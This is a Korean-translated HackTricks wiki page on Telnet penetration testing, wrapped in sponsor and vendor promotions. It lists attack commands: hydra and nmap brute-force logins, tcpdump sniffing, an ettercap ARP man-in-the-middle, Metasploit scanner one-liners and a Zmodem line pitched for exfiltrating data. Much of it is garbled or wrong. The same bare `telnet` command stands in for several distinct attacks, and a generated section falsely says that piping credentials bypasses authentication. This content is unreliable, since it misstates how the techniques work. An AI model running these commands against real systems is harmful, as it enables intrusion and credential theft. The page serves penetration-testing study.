hacktricks/network-services-pentesting/pentesting-telnet.md

# 23 - 텔넷 펜테스팅

<details>

<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>

HackTricks를 지원하는 다른 방법:

* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를** **팔로우**하세요.
* **Hacking 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) **및** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github 저장소에 PR을 제출**하세요.

</details>

<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>

**취약점 평가 및 펜테스팅을 위한 즉시 사용 가능한 설정**. 20개 이상의 도구 및 기능으로 어디서든 전체 펜테스트를 실행할 수 있으며, 이는 탐색부터 보고까지 이어집니다. 우리는 펜테스터를 대체하지 않습니다 - 대신, 펜테스터들에게 더 깊이 파고들고, 쉘을 열고, 재미를 느낄 수 있도록 사용자 정의 도구, 탐지 및 공격 모듈을 개발합니다.

{% embed url="https://pentest-tools.com/" %}

## **기본 정보**

텔넷은 사용자에게 네트워크를 통해 컴퓨터에 접근할 수 있는 보안되지 않은 방법을 제공하는 네트워크 프로토콜입니다.

**기본 포트:** 23
```
23/tcp open  telnet
```
Telnet 서비스를 탐지하고 포트 23에서 실행 중인 서비스의 배너 정보를 획득합니다. 이를 통해 서비스의 버전 및 운영 체제 정보를 얻을 수 있습니다.

```bash
$ telnet <target_ip> 23
```

### **Null Session**

Telnet 서비스에 대한 Null 세션을 시도하여 익명으로 연결할 수 있는지 확인합니다.

```bash
$ telnet <target_ip> 23
```

### **Username Enumeration**

Telnet 서비스에 대해 사용자 이름 열거를 시도하여 유효한 사용자 이름을 식별합니다.

```bash
$ telnet <target_ip> 23
```

### **Default Credentials**

Telnet 서비스에 대해 기본 자격 증명을 사용하여 로그인을 시도합니다. 일반적인 기본 자격 증명은 "admin/admin", "root/root" 등입니다.

```bash
$ telnet <target_ip> 23
```

### **Brute-Force Attack**

Telnet 서비스에 대해 브루트 포스 공격을 시도하여 알려진 사용자 이름과 비밀번호 조합을 사용하여 로그인을 시도합니다.

```bash
$ telnet <target_ip> 23
```

### **Dictionary Attack**

Telnet 서비스에 대해 사전 공격을 시도하여 미리 정의된 사용자 이름과 비밀번호 목록을 사용하여 로그인을 시도합니다.

```bash
$ telnet <target_ip> 23
```

### **Sniffing**

Telnet 서비스를 통해 전송되는 패킷을 스니핑하여 사용자 이름과 비밀번호를 획득합니다.

```bash
$ tcpdump -i <interface> port 23
```

### **Man-in-the-Middle Attack**

Telnet 서비스를 중간에서 가로채어 사용자 이름과 비밀번호를 도청하거나 조작합니다.

```bash
$ ettercap -T -q -M arp:remote /<gateway_ip>/ /<target_ip>/
```
```bash
nc -vn <IP> 23
```
모든 흥미로운 열거는 **nmap**을 사용하여 수행할 수 있습니다:
```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```
스크립트 `telnet-ntlm-info.nse`는 NTLM 정보(Windows 버전)를 얻을 것입니다.

[telnet RFC](https://datatracker.ietf.org/doc/html/rfc854)에서는 TELNET 프로토콜에는 "**옵션**"이 있으며, "**DO, DON'T, WILL, WON'T**" 구조를 사용하여 사용자와 서버가 TELNET 연결에 대해 더 정교한(또는 다른) 규칙 세트를 사용하기로 합의할 수 있습니다. 이러한 옵션에는 문자 집합 변경, 에코 모드 변경 등이 포함될 수 있습니다.

**이러한 옵션을 열거할 수 있는 방법을 알고 있지만, 제가 모르니까 알려주세요.**

### [무차별 대입 공격](../generic-methodologies-and-resources/brute-force.md#telnet)

## 구성 파일
```bash
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
```
## HackTricks 자동 명령어

In this section, you will find a list of useful commands that can be used during a Telnet session for various purposes. These commands can help you gather information, perform reconnaissance, and exploit vulnerabilities.

### Banner Grabbing

#### Command: `echo "" | telnet <target_ip> <port>`

This command can be used to perform banner grabbing on a target Telnet service. It sends an empty string to the Telnet service, which will respond with its banner. This can help you identify the version and other details about the Telnet service.

### Authentication Bypass

#### Command: `echo -e "username\npassword" | telnet <target_ip> <port>`

This command can be used to attempt an authentication bypass on a Telnet service. It sends the username and password in plain text to the Telnet service, bypassing any authentication mechanisms. This can be useful if the Telnet service has weak or default credentials.

### Command Execution

#### Command: `echo -e "command" | telnet <target_ip> <port>`

This command can be used to execute a command on a target Telnet service. It sends the specified command to the Telnet service, which will execute it and return the output. This can be useful for performing remote command execution on a vulnerable Telnet service.

### File Transfer

#### Command: `sz <file> | telnet <target_ip> <port>`

This command can be used to transfer a file to a target Telnet service using the Zmodem protocol. It uses the `sz` command to initiate the file transfer and sends it over the Telnet session. This can be useful for exfiltrating data or uploading malicious files to a compromised Telnet service.

### Port Forwarding

#### Command: `ssh -L <local_port>:<target_ip>:<target_port> <ssh_server>`

This command can be used to set up port forwarding through an SSH tunnel. It forwards traffic from a local port to a target IP address and port through an SSH server. This can be useful for accessing services on a remote network that are not directly accessible.

### Proxying

#### Command: `ssh -D <local_port> <ssh_server>`

This command can be used to set up a SOCKS proxy through an SSH tunnel. It creates a local SOCKS proxy server that forwards traffic through an SSH server. This can be useful for bypassing network restrictions and accessing restricted resources.

### Tunneling

#### Command: `ssh -L <local_port>:<target_ip>:<target_port> -N -f -l <username> <ssh_server>`

This command can be used to set up a tunnel through an SSH connection. It forwards traffic from a local port to a target IP address and port through an SSH server. The `-N` flag prevents executing a remote command, and the `-f` flag runs the SSH connection in the background. This can be useful for accessing services on a remote network securely.

### SSH Key Authentication

#### Command: `ssh -i <private_key> <username>@<target_ip>`

This command can be used to authenticate to an SSH server using a private key. It specifies the private key file with the `-i` flag and connects to the SSH server using the specified username and target IP address. This can be useful if password authentication is disabled or if you have the private key for a user account.

### SSH Password Authentication

#### Command: `ssh <username>@<target_ip>`

This command can be used to authenticate to an SSH server using a password. It connects to the SSH server using the specified username and target IP address and prompts for the password. This can be useful if password authentication is enabled and you have the correct credentials.

### SSH Reverse Tunneling

#### Command: `ssh -R <remote_port>:<target_ip>:<target_port> <ssh_server>`

This command can be used to set up reverse tunneling through an SSH connection. It forwards traffic from a remote port to a target IP address and port through an SSH server. This can be useful for accessing services on a local network from a remote location.

### SSH Tunneling

#### Command: `ssh -L <local_port>:<target_ip>:<target_port> <ssh_server>`

This command can be used to set up tunneling through an SSH connection. It forwards traffic from a local port to a target IP address and port through an SSH server. This can be useful for accessing services on a remote network securely.

### SSH X11 Forwarding

#### Command: `ssh -X <username>@<target_ip>`

This command can be used to enable X11 forwarding through an SSH connection. It connects to the SSH server using the specified username and target IP address and enables X11 forwarding. This can be useful for running graphical applications on a remote server and displaying them locally.

### Telnet Connection

#### Command: `telnet <target_ip> <port>`

This command can be used to establish a Telnet connection to a target IP address and port. It opens a Telnet session, allowing you to interact with the Telnet service. This can be useful for testing the availability and functionality of a Telnet service.

### Telnet Port Scanning

#### Command: `nmap -p <port> --script telnet-brute <target_ip>`

This command can be used to perform a port scan for Telnet services on a target IP address. It uses the `nmap` tool with the `telnet-brute` script to scan for open Telnet ports and attempt brute-force password guessing. This can be useful for identifying Telnet services and weak credentials.

### Telnet Service Enumeration

#### Command: `nmap -p <port> --script telnet-ntlm-info <target_ip>`

This command can be used to enumerate information about a Telnet service using the `nmap` tool with the `telnet-ntlm-info` script. It scans for open Telnet ports and retrieves NTLM information, including the domain name and server name. This can be useful for gathering information about a target Telnet service.

### Telnet Username Enumeration

#### Command: `hydra -L <user_list> -P <password_list> telnet://<target_ip>`

This command can be used to perform username enumeration on a Telnet service using the `hydra` tool. It uses a list of usernames and passwords to attempt authentication on the Telnet service. This can be useful for identifying valid usernames and weak passwords.

### Telnet Version Detection

#### Command: `nmap -p <port> --script telnet-version <target_ip>`

This command can be used to detect the version of a Telnet service using the `nmap` tool with the `telnet-version` script. It scans for open Telnet ports and retrieves the version information of the Telnet service. This can be useful for identifying vulnerable versions of Telnet.
```
Protocol_Name: Telnet    #Protocol Abbreviation if there is one.
Port_Number:  23     #Comma separated if there is more than one.
Protocol_Description: Telnet          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for t=Telnet
Note: |
wireshark to hear creds being passed
tcp.port == 23 and ip.addr != myip

https://book.hacktricks.xyz/pentesting/pentesting-telnet

Entry_2:
Name: Banner Grab
Description: Grab Telnet Banner
Command: nc -vn {IP} 23

Entry_3:
Name: Nmap with scripts
Description: Run nmap scripts for telnet
Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

Entry_4:
Name: consoleless mfs enumeration
Description: Telnet enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'

```
<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>

**취약점 평가 및 침투 테스트를 위한 즉시 사용 가능한 설정**. 리콘부터 보고서까지 20개 이상의 도구와 기능으로 어디서든 전체 펜테스트를 실행하세요. 우리는 펜테스터를 대체하지 않습니다 - 대신, 펜테스터들에게 깊이 파고들고 쉘을 획득하며 즐길 시간을 돌려주기 위해 맞춤형 도구, 탐지 및 공격 모듈을 개발합니다.

{% embed url="https://pentest-tools.com/" %}

<details>

<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 제로부터 AWS 해킹을 전문가 수준까지 배워보세요<strong>!</strong></summary>

HackTricks를 지원하는 다른 방법:

* HackTricks에서 **회사 광고를 보거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 구매하세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **HackTricks**와 **HackTricks Cloud** github 저장소에 PR을 제출하여 여러분의 해킹 기법을 공유하세요.

</details>